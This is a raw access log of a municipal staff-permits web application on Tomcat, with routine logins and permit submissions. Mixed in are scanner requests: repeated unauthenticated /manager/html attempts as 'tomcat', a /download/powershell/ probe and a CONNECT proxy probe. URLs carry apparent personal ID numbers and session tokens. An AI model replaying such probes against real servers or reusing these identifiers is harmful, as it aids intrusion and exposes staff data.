190.171.142.42 - - [13/Aug/2024:09:05:13 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1726
190.171.149.74 - - [13/Aug/2024:09:05:15 -0300] "GET /cormun/servlet/trpermisosgoce? HTTP/1.1" 200 6023
190.171.149.74 - - [13/Aug/2024:09:05:16 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1745
190.171.149.74 - - [13/Aug/2024:09:05:16 -0300] "GET /cormun/servlet/trpermisosgoce? HTTP/1.1" 200 6033
190.171.149.74 - - [13/Aug/2024:09:05:21 -0300] "POST /cormun/servlet/hlogin?b2734d279f337f343244a584d1444ba5,gx-no-cache=1723550656426 HTTP/1.1" 200 90
190.171.149.74 - - [13/Aug/2024:09:05:21 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 960
190.171.149.74 - - [13/Aug/2024:09:05:21 -0300] "GET /cormun/servlet/trpermisosgoce HTTP/1.1" 200 15598
190.171.142.42 - - [13/Aug/2024:09:05:21 -0300] "POST /cormun/servlet/hlogin?71236200d621eaf29411debedbc0f7a7,gx-no-cache=1723550657356 HTTP/1.1" 200 90
190.171.142.42 - - [13/Aug/2024:09:05:21 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 955
190.171.142.42 - - [13/Aug/2024:09:05:22 -0300] "GET /cormun/servlet/hhome HTTP/1.1" 200 3895
190.171.149.74 - - [13/Aug/2024:09:05:23 -0300] "GET /cormun/servlet/trpermisosgoce? HTTP/1.1" 200 15600
190.171.142.42 - - [13/Aug/2024:09:05:25 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 14983
190.171.149.74 - - [13/Aug/2024:09:05:25 -0300] "GET /cormun/servlet/permisogoce?INS,0,,, HTTP/1.1" 200 6849
190.171.149.74 - - [13/Aug/2024:09:05:31 -0300] "GET /cormun/servlet/permisogoce?ca9b0d8a4b1b615a1282c495bf82d40c99d31cf3ec90dff0601370980c980dbd40dd1a78aebec831a27765037867743dc9d118b8cff0ebaaac0543df3e63146a,gx-no-cache=1723550666943 HTTP/1.1" 200 88
190.171.149.74 - - [13/Aug/2024:09:05:33 -0300] "GET /cormun/static/menuarrow.gif HTTP/1.1" 404 1015
190.171.149.74 - - [13/Aug/2024:09:05:37 -0300] "GET /cormun/servlet/permisogoce?ca9b0d8a4b1b615a1282c495bf82d40cdcddb3e09c928eddbb8a2549f0565dc8641db5f05c17c373e368512c71d4855e6100a7c30d7aa637db42a0c2d3cb7acb,gx-no-cache=1723550672632 HTTP/1.1" 200 48
190.171.149.74 - - [13/Aug/2024:09:05:40 -0300] "POST /cormun/servlet/permisogoce?b2734d279f337f343244a584d1444ba5,INS,0,,,,gx-no-cache=1723550674491 HTTP/1.1" 200 93
190.171.149.74 - - [13/Aug/2024:09:05:40 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1015
190.171.149.74 - - [13/Aug/2024:09:05:41 -0300] "GET /cormun/servlet/trpermisosgoce HTTP/1.1" 200 15882
190.171.149.74 - - [13/Aug/2024:09:05:43 -0300] "GET /cormun/servlet/apermisogoceprn?13109954,P,20240813080443,PU HTTP/1.1" 200 1660
190.171.149.74 - - [13/Aug/2024:09:06:09 -0300] "POST /cormun/servlet/trpermisosgoce?b2734d279f337f343244a584d1444ba5,gx-no-cache=1723550704461 HTTP/1.1" 200 5090
190.171.149.74 - - [13/Aug/2024:09:06:55 -0300] "POST /cormun/servlet/trpermisosgoce?b2734d279f337f343244a584d1444ba5,gx-no-cache=1723550750083 HTTP/1.1" 200 15373
190.171.149.74 - - [13/Aug/2024:09:07:12 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 14915
46.105.97.78 - tomcat [13/Aug/2024:09:08:48 -0300] "GET /manager/html HTTP/1.1" 403 3196
200.54.103.162 - - [13/Aug/2024:09:12:14 -0300] "GET /cormun/servlet/hhome HTTP/1.1" 200 4329
200.54.103.162 - - [13/Aug/2024:09:12:16 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 14570
46.105.97.78 - tomcat [13/Aug/2024:09:12:36 -0300] "GET /manager/html HTTP/1.1" 403 3196
190.171.143.82 - - [13/Aug/2024:09:14:55 -0300] "GET /cormun/servlet/hhome HTTP/1.1" 200 3323
190.171.143.82 - - [13/Aug/2024:09:14:57 -0300] "GET /cormun/servlet/hhome HTTP/1.1" 200 3333
190.171.143.82 - - [13/Aug/2024:09:14:58 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1735
190.171.143.82 - - [13/Aug/2024:09:15:01 -0300] "POST /cormun/servlet/hlogin?8e3ad896d2834bdbba51af5bce192f7d,gx-no-cache=1723551236754 HTTP/1.1" 200 90
190.171.143.82 - - [13/Aug/2024:09:15:01 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 954
190.171.143.82 - - [13/Aug/2024:09:15:01 -0300] "GET /cormun/servlet/hhome HTTP/1.1" 200 4261
190.171.143.82 - - [13/Aug/2024:09:15:16 -0300] "GET /cormun/servlet/trpermisosgoce? HTTP/1.1" 200 11811
190.171.143.82 - - [13/Aug/2024:09:15:22 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 11365
46.105.97.78 - tomcat [13/Aug/2024:09:16:24 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:09:20:11 -0300] "GET /manager/html HTTP/1.1" 403 3196
190.171.154.42 - - [13/Aug/2024:09:20:50 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1718
190.171.154.42 - - [13/Aug/2024:09:20:57 -0300] "POST /cormun/servlet/hlogin?5eaca61bb4aeb353d363517d9abfeaf7,gx-no-cache=1723551592696 HTTP/1.1" 200 90
190.171.154.42 - - [13/Aug/2024:09:20:57 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 950
190.171.154.42 - - [13/Aug/2024:09:20:57 -0300] "GET /cormun/servlet/hhome HTTP/1.1" 200 3878
190.171.154.42 - - [13/Aug/2024:09:21:00 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 12128
200.54.103.162 - - [13/Aug/2024:09:21:31 -0300] "GET /cormun/servlet/licenciaspermisos?INS,0,,, HTTP/1.1" 200 7953
200.54.103.162 - - [13/Aug/2024:09:21:31 -0300] "GET /cormun/static/gxcfg.js?202012153173 HTTP/1.1" 200 953
200.54.103.162 - - [13/Aug/2024:09:21:31 -0300] "GET /cormun/static/licenciaspermisos.js?2020121532136 HTTP/1.1" 200 38753
200.54.103.162 - - [13/Aug/2024:09:21:31 -0300] "GET /cormun/servlet/licenciaspermisos?INS,0,,, HTTP/1.1" 200 7961
200.54.103.162 - - [13/Aug/2024:09:21:35 -0300] "GET /cormun/servlet/licenciaspermisos?6a97250f697dfd78d1eb4e14800cb6500d2eca45699b7510e997e0c9be94431d86585dd175f228fdee8628af8db3b7c9f7d1e3c9975118fdcfe2f4fc08cf172c,gx-no-cache=1723551631358 HTTP/1.1" 200 155
200.54.103.162 - - [13/Aug/2024:09:21:35 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-icons_82798d_256x240.png HTTP/1.1" 404 1089
200.54.103.162 - - [13/Aug/2024:09:21:35 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-bg_highlight-soft_100_c6c2c8_1x100.png HTTP/1.1" 404 1117
200.54.103.162 - - [13/Aug/2024:09:21:35 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-bg_flat_55_994d53_40x100.png HTTP/1.1" 404 1097
200.54.103.162 - - [13/Aug/2024:09:21:35 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-icons_ebccce_256x240.png HTTP/1.1" 404 1089
200.54.103.162 - - [13/Aug/2024:09:21:56 -0300] "GET /cormun/servlet/licenciaspermisos?6a97250f697dfd78d1eb4e14800cb650516306df49de479556eb8a61f51c22d91f67fd569994f48fe37c2594d7fcd65b99ab9668d1de3ed7543f8a2ea33b9ca3,gx-no-cache=1723551651991 HTTP/1.1" 200 108
200.54.103.162 - - [13/Aug/2024:09:21:56 -0300] "POST /cormun/servlet/licenciaspermisos?b5081c9e78ac300b7026b3c8d7b9ecb5,INS,0,,,,gx-no-cache=1723551652022 HTTP/1.1" 200 5124
200.54.103.162 - - [13/Aug/2024:09:22:17 -0300] "GET /cormun/static/menuarrow.gif HTTP/1.1" 404 1015
190.171.141.138 - - [13/Aug/2024:09:23:38 -0300] "GET /cormun/servlet/trpermisosgoce HTTP/1.1" 200 6028
190.171.141.138 - - [13/Aug/2024:09:23:38 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1735
190.171.141.138 - - [13/Aug/2024:09:23:38 -0300] "GET /cormun/servlet/trpermisosgoce HTTP/1.1" 200 6024
46.105.97.78 - tomcat [13/Aug/2024:09:23:59 -0300] "GET /manager/html HTTP/1.1" 403 3196
200.54.103.162 - - [13/Aug/2024:09:24:42 -0300] "GET /cormun/servlet/licenciaspermisos?6a97250f697dfd78d1eb4e14800cb65017af20ef49228d7f251257b3be327f348ea14ac2a2962e6029cf73a39ba6dd7493896e0867ae01559149a85c53374a5d4a2020aac290c8dabf6e31fe5e3eb02a124a7cc2c9611eaeeaa8c8a2349a335069085aeafec6d2318fc186df6727765c0f1e3852945eef5f59ba9b7ae27f6df9cd5acf0fd9fa94ebce2de134f7fc12f6dd1433a3c0be332f26d2573e085036f5f7d1e3c9975118fdcfe2f4fc08cf172c,gx-no-cache=1723551817436 HTTP/1.1" 200 30
200.54.103.162 - - [13/Aug/2024:09:24:42 -0300] "GET /cormun/servlet/licenciaspermisos?6a97250f697dfd78d1eb4e14800cb650745b78adae9ff5f16fdfe5a3494060d0df437fcf8870388aa420072edf6b785988adee88a6db895a5869a613825fd0adbf26235c51549fcde6c09f006d617937913b0207909264b4262f1783ae6c927c2894e174ebeaa46c0c1ea5c5f18041ddd9dc53166d2d2661a95e7c3902f2312b1e5cefcb9ffdbd80e7bc040ea20df2d46611f523c763afe546c31c78f1a28a3efe892e2b8fa6faa15226393b351d1b7c,gx-no-cache=1723551817504 HTTP/1.1" 200 29
200.54.103.162 - - [13/Aug/2024:09:24:43 -0300] "POST /cormun/servlet/licenciaspermisos?b5081c9e78ac300b7026b3c8d7b9ecb5,INS,0,,,,gx-no-cache=1723551817520 HTTP/1.1" 200 93
200.54.103.162 - - [13/Aug/2024:09:24:43 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1011
200.54.103.162 - - [13/Aug/2024:09:24:43 -0300] "GET /cormun/static/hpexe_return.js?20221129846037 HTTP/1.1" 200 1633
200.54.103.162 - - [13/Aug/2024:09:24:43 -0300] "GET /cormun/static/gxcfg.js?20221129846035 HTTP/1.1" 200 953
200.54.103.162 - - [13/Aug/2024:09:24:43 -0300] "GET /cormun/servlet/trlicencias HTTP/1.1" 200 15169
200.54.103.162 - - [13/Aug/2024:09:24:46 -0300] "GET /cormun/servlet/trlicenciaspermisosadjuntos?15916030,20240813000000,L, HTTP/1.1" 200 6709
200.54.103.162 - - [13/Aug/2024:09:24:46 -0300] "GET /cormun/static/gxui/gxui-all.css?110300 HTTP/1.1" 200 2179
200.54.103.162 - - [13/Aug/2024:09:24:46 -0300] "GET /cormun/static/calendar-system.css?75620 HTTP/1.1" 200 5572
200.54.103.162 - - [13/Aug/2024:09:24:46 -0300] "GET /cormun/static/gxcfg.js?201991422445549 HTTP/1.1" 200 953
200.54.103.162 - - [13/Aug/2024:09:24:46 -0300] "GET /cormun/static/trlicenciaspermisosadjuntos.js?20199142244593 HTTP/1.1" 200 21036
200.54.103.162 - - [13/Aug/2024:09:24:46 -0300] "GET /cormun/static/Resources/Spanish/PXTools.css?2294816 HTTP/1.1" 200 100853
200.54.103.162 - - [13/Aug/2024:09:24:46 -0300] "GET /cormun/static/Shared/ext/resources/css/ext-all.css?205870 HTTP/1.1" 200 416045
200.54.103.162 - - [13/Aug/2024:09:24:48 -0300] "GET /cormun/servlet/licenciaspermisosadjuntos?INS,15916030,L,20240813000000,, HTTP/1.1" 200 5999
200.54.103.162 - - [13/Aug/2024:09:24:48 -0300] "GET /cormun/static/gxcfg.js?20201215114875 HTTP/1.1" 200 953
200.54.103.162 - - [13/Aug/2024:09:24:48 -0300] "GET /cormun/static/licenciaspermisosadjuntos.js?20201215114932 HTTP/1.1" 200 8760
200.54.103.162 - - [13/Aug/2024:09:24:48 -0300] "GET /cormun/static/about:blank HTTP/1.1" 404 1011
200.54.103.162 - - [13/Aug/2024:09:24:54 -0300] "POST /cormun/servlet/licenciaspermisosadjuntos?b5081c9e78ac300b7026b3c8d7b9ecb5,INS,15916030,L,20240813000000,, HTTP/1.1" 200 116
200.54.103.162 - - [13/Aug/2024:09:24:54 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1041
200.54.103.162 - - [13/Aug/2024:09:24:54 -0300] "GET /cormun/servlet/trlicenciaspermisosadjuntos?15916030,20240813000000,L, HTTP/1.1" 200 7216
200.54.103.162 - - [13/Aug/2024:09:24:57 -0300] "POST /cormun/servlet/trlicenciaspermisosadjuntos?b5081c9e78ac300b7026b3c8d7b9ecb5,15916030,20240813000000,L,,gx-no-cache=1723551832468 HTTP/1.1" 200 90
200.54.103.162 - - [13/Aug/2024:09:24:57 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 984
200.54.103.162 - - [13/Aug/2024:09:24:57 -0300] "GET /cormun/servlet/trlicencias HTTP/1.1" 200 15165
200.54.103.162 - - [13/Aug/2024:09:25:03 -0300] "GET /cormun/servlet/alicenciaprn?15916030,L,20240813000000,PU HTTP/1.1" 200 1532
200.54.103.162 - - [13/Aug/2024:09:25:21 -0300] "POST /cormun/servlet/trlicencias?b5081c9e78ac300b7026b3c8d7b9ecb5,gx-no-cache=1723551856615 HTTP/1.1" 200 12784
200.54.103.162 - - [13/Aug/2024:09:25:21 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-bg_flat_55_fafafa_40x100.png HTTP/1.1" 404 1097
200.54.103.162 - - [13/Aug/2024:09:25:21 -0300] "GET /cormun/static/Shared/jqueryui/images/ui-icons_8d78a5_256x240.png HTTP/1.1" 404 1089
200.54.103.162 - - [13/Aug/2024:09:25:52 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1736
46.105.97.78 - tomcat [13/Aug/2024:09:27:46 -0300] "GET /manager/html HTTP/1.1" 403 3196
190.171.143.82 - - [13/Aug/2024:09:29:19 -0300] "POST /cormun/servlet/trlicencias?8e3ad896d2834bdbba51af5bce192f7d,,gx-no-cache=1723552094503 HTTP/1.1" 200 8927
190.171.143.82 - - [13/Aug/2024:09:29:52 -0300] "GET /cormun/servlet/trpermisosgoce? HTTP/1.1" 200 11809
142.93.95.82 - - [13/Aug/2024:09:29:54 -0300] "GET / HTTP/1.1" 200 11217
142.93.95.82 - - [13/Aug/2024:09:29:55 -0300] "GET /download/powershell/ HTTP/1.1" 404 1001
46.105.97.78 - tomcat [13/Aug/2024:09:32:01 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:09:36:19 -0300] "GET /manager/html HTTP/1.1" 403 3196
46.105.97.78 - tomcat [13/Aug/2024:09:40:06 -0300] "GET /manager/html HTTP/1.1" 403 3196
190.171.141.138 - - [13/Aug/2024:09:40:24 -0300] "POST /cormun/servlet/hlogin?05bd123568b8ed5f85f6ee76f243fb03,gx-no-cache=1723552759816 HTTP/1.1" 200 90
190.171.141.138 - - [13/Aug/2024:09:40:24 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 952
190.171.141.138 - - [13/Aug/2024:09:40:24 -0300] "GET /cormun/servlet/trpermisosgoce HTTP/1.1" 200 12275
190.171.141.138 - - [13/Aug/2024:09:40:29 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 15325
190.171.141.106 - - [13/Aug/2024:09:43:48 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1723
190.171.141.106 - - [13/Aug/2024:09:43:48 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1733
46.105.97.78 - tomcat [13/Aug/2024:09:43:53 -0300] "GET /manager/html HTTP/1.1" 403 3196
190.171.144.234 - - [13/Aug/2024:09:45:06 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1724
190.171.144.234 - - [13/Aug/2024:09:45:58 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1710
190.171.144.234 - - [13/Aug/2024:09:45:58 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1710
190.171.144.234 - - [13/Aug/2024:09:46:05 -0300] "POST /cormun/servlet/hlogin?ab35ff2531e91c428e20351d3f9fc22c,gx-no-cache=1723553100172 HTTP/1.1" 200 90
190.171.144.234 - - [13/Aug/2024:09:46:05 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 940
190.171.144.234 - - [13/Aug/2024:09:46:06 -0300] "GET /cormun/servlet/hhome HTTP/1.1" 200 3986
190.171.144.234 - - [13/Aug/2024:09:46:09 -0300] "GET /cormun/servlet/trpermisosgoce? HTTP/1.1" 200 15167
190.171.144.234 - - [13/Aug/2024:09:46:18 -0300] "GET /cormun/servlet/permisogoce?INS,0,,, HTTP/1.1" 200 6849
190.171.144.234 - - [13/Aug/2024:09:46:30 -0300] "GET /cormun/servlet/permisogoce?6fa74921ac919cd10e4f1a874b5b7fff5389b57603660810d7fccd47663dfebcc0a0e198715095517815cb75e549915e145044c9f2e5511608f729bd066777c1,gx-no-cache=1723553124846 HTTP/1.1" 200 79
190.171.144.234 - - [13/Aug/2024:09:46:30 -0300] "GET /cormun/static/menuarrow.gif HTTP/1.1" 404 1015
190.171.144.234 - - [13/Aug/2024:09:46:40 -0300] "GET /cormun/servlet/permisogoce?6fa74921ac919cd10e4f1a874b5b7fffb19e90bb5c6fcd86ccc55177bc31cc081b10006bebfd43ac1ca1010de184fb84790a06b78b8bcb7d2c76dff421da3091,gx-no-cache=1723553135078 HTTP/1.1" 200 48
190.171.144.234 - - [13/Aug/2024:09:46:44 -0300] "POST /cormun/servlet/permisogoce?ab35ff2531e91c428e20351d3f9fc22c,INS,0,,,,gx-no-cache=1723553138540 HTTP/1.1" 200 93
190.171.144.234 - - [13/Aug/2024:09:46:45 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 999
190.171.144.234 - - [13/Aug/2024:09:46:45 -0300] "GET /cormun/servlet/trpermisosgoce HTTP/1.1" 200 15361
190.171.144.234 - - [13/Aug/2024:09:46:48 -0300] "GET /cormun/servlet/apermisogoceprn?20029180,P,20240813084536,PU HTTP/1.1" 200 1660
190.171.144.234 - - [13/Aug/2024:09:47:05 -0300] "GET /cormun/servlet/permisogoce?INS,0,,, HTTP/1.1" 200 6849
190.171.144.234 - - [13/Aug/2024:09:47:15 -0300] "GET /cormun/servlet/permisogoce?6fa74921ac919cd10e4f1a874b5b7fff0cff00db41e5c050daadbc1fdb7ad5cdc0a0e198715095517815cb75e549915e145044c9f2e5511608f729bd066777c1,gx-no-cache=1723553169651 HTTP/1.1" 200 76
190.171.144.234 - - [13/Aug/2024:09:47:25 -0300] "GET /cormun/servlet/permisogoce?6fa74921ac919cd10e4f1a874b5b7fffb8f4592a671b9b355f4556642553e4526503e020472bd5187bc91cab7a0bdadf790a06b78b8bcb7d2c76dff421da3091,gx-no-cache=1723553179601 HTTP/1.1" 200 47
190.171.144.234 - - [13/Aug/2024:09:47:31 -0300] "POST /cormun/servlet/permisogoce?ab35ff2531e91c428e20351d3f9fc22c,INS,0,,,,gx-no-cache=1723553185709 HTTP/1.1" 200 93
190.171.144.234 - - [13/Aug/2024:09:47:31 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 999
190.171.144.234 - - [13/Aug/2024:09:47:32 -0300] "GET /cormun/servlet/trpermisosgoce HTTP/1.1" 200 15580
190.171.144.234 - - [13/Aug/2024:09:47:35 -0300] "GET /cormun/servlet/apermisogoceprn?17137430,P,20240813084622,PU HTTP/1.1" 200 1657
46.105.97.78 - tomcat [13/Aug/2024:09:47:40 -0300] "GET /manager/html HTTP/1.1" 403 3196
190.171.144.234 - - [13/Aug/2024:09:47:46 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 12450
185.224.128.66 - - [13/Aug/2024:09:48:33 -0300] "GET / HTTP/1.1" 200 11217
190.171.149.74 - - [13/Aug/2024:09:50:27 -0300] "GET /cormun/servlet/trpermisosgoce? HTTP/1.1" 200 6033
190.171.149.74 - - [13/Aug/2024:09:50:27 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1737
190.171.149.74 - - [13/Aug/2024:09:50:33 -0300] "POST /cormun/servlet/hlogin?12af84251cc6ca6c0ec6082259815439,gx-no-cache=1723553368885 HTTP/1.1" 200 90
190.171.149.74 - - [13/Aug/2024:09:50:33 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 956
190.171.149.74 - - [13/Aug/2024:09:50:33 -0300] "GET /cormun/servlet/trpermisosgoce HTTP/1.1" 200 15872
190.171.149.74 - - [13/Aug/2024:09:50:37 -0300] "GET /cormun/servlet/permisogoce?INS,0,,, HTTP/1.1" 200 6847
190.171.149.74 - - [13/Aug/2024:09:50:45 -0300] "GET /cormun/servlet/permisogoce?eaac90bbd57dcd6d7d25a77cc21ffd0a7525ebc335633015edd0139eeef654958f462a15fad30c9df9c9e461c12cebe6f2465bc17d84d5c36996e1d92c225575,gx-no-cache=1723553380618 HTTP/1.1" 200 87
190.171.149.74 - - [13/Aug/2024:09:50:48 -0300] "GET /cormun/static/menuarrow.gif HTTP/1.1" 404 1015
190.171.149.74 - - [13/Aug/2024:09:50:56 -0300] "GET /cormun/servlet/permisogoce?eaac90bbd57dcd6d7d25a77cc21ffd0a61706a56b308dd5cf4af6e676559d6d4c49dea5bcc69f98b12904faf27567e54ee22ae30a1250e9b4dc35693928c96f3,gx-no-cache=1723553391651 HTTP/1.1" 200 48
190.171.149.74 - - [13/Aug/2024:09:50:58 -0300] "POST /cormun/servlet/permisogoce?12af84251cc6ca6c0ec6082259815439,INS,0,,,,gx-no-cache=1723553393773 HTTP/1.1" 200 93
190.171.149.74 - - [13/Aug/2024:09:50:58 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1009
190.171.149.74 - - [13/Aug/2024:09:50:59 -0300] "GET /cormun/servlet/trpermisosgoce HTTP/1.1" 200 16121
190.171.149.74 - - [13/Aug/2024:09:51:01 -0300] "GET /cormun/servlet/apermisogoceprn?13109954,P,20240813080443,PU HTTP/1.1" 200 1660
190.171.149.74 - - [13/Aug/2024:09:51:01 -0300] "GET /cormun/servlet/apermisogoceprn?13109954,P,20240813080443,PU HTTP/1.1" 200 1660
190.171.149.74 - - [13/Aug/2024:09:51:09 -0300] "GET /cormun/servlet/apermisogoceprn?13109954,P,20240813080443,PU HTTP/1.1" 200 1659
190.171.149.74 - - [13/Aug/2024:09:51:09 -0300] "GET /cormun/servlet/apermisogoceprn?13109954,P,20240813080443,PU HTTP/1.1" 200 1655
190.171.149.74 - - [13/Aug/2024:09:51:35 -0300] "GET /cormun/servlet/apermisogoceprn?13109954,P,20240813080443,PU HTTP/1.1" 200 1661
190.171.149.74 - - [13/Aug/2024:09:51:35 -0300] "GET /cormun/servlet/apermisogoceprn?13109954,P,20240813080443,PU HTTP/1.1" 200 1660
190.171.149.74 - - [13/Aug/2024:09:51:38 -0300] "GET /cormun/servlet/apermisogoceprn?9014931,P,20240813084954,PU HTTP/1.1" 200 1652
190.171.149.74 - - [13/Aug/2024:09:51:38 -0300] "GET /cormun/servlet/apermisogoceprn?9014931,P,20240813084954,PU HTTP/1.1" 200 1648
46.105.97.78 - tomcat [13/Aug/2024:09:51:55 -0300] "GET /manager/html HTTP/1.1" 403 3196
190.171.149.74 - - [13/Aug/2024:09:52:28 -0300] "GET /cormun/servlet/apermisogoceprn?9014931,P,20240813084954,PU HTTP/1.1" 200 1653
190.171.149.74 - - [13/Aug/2024:09:52:29 -0300] "GET /cormun/servlet/apermisogoceprn?9014931,P,20240813084954,PU HTTP/1.1" 200 1652
190.95.15.15 - - [13/Aug/2024:09:52:41 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1718
190.95.15.15 - - [13/Aug/2024:09:52:41 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1729
190.95.15.15 - - [13/Aug/2024:09:52:48 -0300] "POST /cormun/servlet/hlogin?61d3dc2b61eea1cfe8afc079df7c432a,gx-no-cache=1723553503358 HTTP/1.1" 200 90
190.95.15.15 - - [13/Aug/2024:09:52:48 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 948
190.95.15.15 - - [13/Aug/2024:09:52:48 -0300] "GET /cormun/servlet/hhome HTTP/1.1" 200 3973
190.95.15.15 - - [13/Aug/2024:09:52:50 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 12637
46.105.97.78 - tomcat [13/Aug/2024:09:56:14 -0300] "GET /manager/html HTTP/1.1" 403 3196
205.210.31.247 - - [13/Aug/2024:09:56:36 -0300] "GET / HTTP/1.1" 200 11217
154.213.184.25 - - [13/Aug/2024:09:56:55 -0300] "CONNECT google.com:443 HTTP/1.1" 400 -
46.105.97.78 - tomcat [13/Aug/2024:10:00:01 -0300] "GET /manager/html HTTP/1.1" 403 3196
190.171.144.234 - - [13/Aug/2024:10:02:55 -0300] "GET /cormun/servlet/trpermisosgoce? HTTP/1.1" 200 15575
190.171.144.234 - - [13/Aug/2024:10:03:00 -0300] "GET /cormun/servlet/apermisogoceprn?17137430,P,20240813084622,PU HTTP/1.1" 200 1656
46.105.97.78 - tomcat [13/Aug/2024:10:03:48 -0300] "GET /manager/html HTTP/1.1" 403 3196
190.171.141.138 - - [13/Aug/2024:10:07:28 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1718
190.171.141.138 - - [13/Aug/2024:10:07:30 -0300] "POST /cormun/servlet/hlogin?05bd123568b8ed5f85f6ee76f243fb03,gx-no-cache=1723554385913 HTTP/1.1" 200 90
190.171.141.138 - - [13/Aug/2024:10:07:30 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 951
190.171.141.138 - - [13/Aug/2024:10:07:30 -0300] "GET /cormun/servlet/trlicencias HTTP/1.1" 200 15325
190.171.141.138 - - [13/Aug/2024:10:07:33 -0300] "GET /cormun/servlet/trpermisosgoce? HTTP/1.1" 200 12274
190.171.141.138 - - [13/Aug/2024:10:07:35 -0300] "GET /cormun/servlet/permisogoce?INS,0,,, HTTP/1.1" 200 7371
46.105.97.78 - tomcat [13/Aug/2024:10:07:36 -0300] "GET /manager/html HTTP/1.1" 403 3196
190.171.153.50 - - [13/Aug/2024:10:07:37 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1718
190.171.153.50 - - [13/Aug/2024:10:07:38 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1728
190.171.141.138 - - [13/Aug/2024:10:07:45 -0300] "GET /cormun/servlet/permisogoce?30b3126a5f818f1fde1c5151fa7d3f4958a5c0060b0db597e516c5dc85f6461cc4b1510e136dfb1c1c780b1608b21e098750e532bff0eaac2de62dc35d56c012,gx-no-cache=1723554400991 HTTP/1.1" 200 83
190.171.141.138 - - [13/Aug/2024:10:07:45 -0300] "GET /cormun/static/menuarrow.gif HTTP/1.1" 404 1015
190.171.153.50 - - [13/Aug/2024:10:07:48 -0300] "POST /cormun/servlet/hlogin?47901e017db88ad8a212da440993912d,gx-no-cache=1723554403880 HTTP/1.1" 200 90
190.171.153.50 - - [13/Aug/2024:10:07:48 -0300] "GET /cormun/servlet/hpexe_link HTTP/1.1" 200 950
190.171.153.50 - - [13/Aug/2024:10:07:48 -0300] "GET /cormun/servlet/hhome HTTP/1.1" 200 4178
190.171.153.50 - - [13/Aug/2024:10:07:50 -0300] "GET /cormun/servlet/trlicencias? HTTP/1.1" 200 10133
190.171.141.138 - - [13/Aug/2024:10:07:52 -0300] "GET /cormun/servlet/permisogoce?30b3126a5f818f1fde1c5151fa7d3f495e4d5227abe2d1dece4754da87fd075c8e9f8b24ea5e56ac9eb090dab505e746c57275647a79473bc5c9c68cee24d57a,gx-no-cache=1723554407410 HTTP/1.1" 200 47
190.171.141.138 - - [13/Aug/2024:10:07:59 -0300] "POST /cormun/servlet/permisogoce?05bd123568b8ed5f85f6ee76f243fb03,INS,0,,,,gx-no-cache=1723554413307 HTTP/1.1" 200 93
190.171.141.138 - - [13/Aug/2024:10:07:59 -0300] "GET /cormun/servlet/hpexe_return? HTTP/1.1" 200 1006
190.171.153.50 - - [13/Aug/2024:10:07:59 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1736
190.171.141.138 - - [13/Aug/2024:10:07:59 -0300] "GET /cormun/servlet/trpermisosgoce HTTP/1.1" 200 12575
190.171.141.138 - - [13/Aug/2024:10:08:02 -0300] "GET /cormun/servlet/apermisogoceprn?13046201,P,20240813090652,PU HTTP/1.1" 200 1665
46.105.97.78 - tomcat [13/Aug/2024:10:11:24 -0300] "GET /manager/html HTTP/1.1" 403 3196
190.171.141.138 - - [13/Aug/2024:10:12:24 -0300] "GET /cormun/servlet/permisogoce?INS,0,,, HTTP/1.1" 200 7371
190.171.141.138 - - [13/Aug/2024:10:12:35 -0300] "GET /cormun/servlet/permisogoce?30b3126a5f818f1fde1c5151fa7d3f498000947648afd8ee3f2ef57c0db92f84c4b1510e136dfb1c1c780b1608b21e098750e532bff0eaac2de62dc35d56c012,gx-no-cache=1723554690914 HTTP/1.1" 200 78
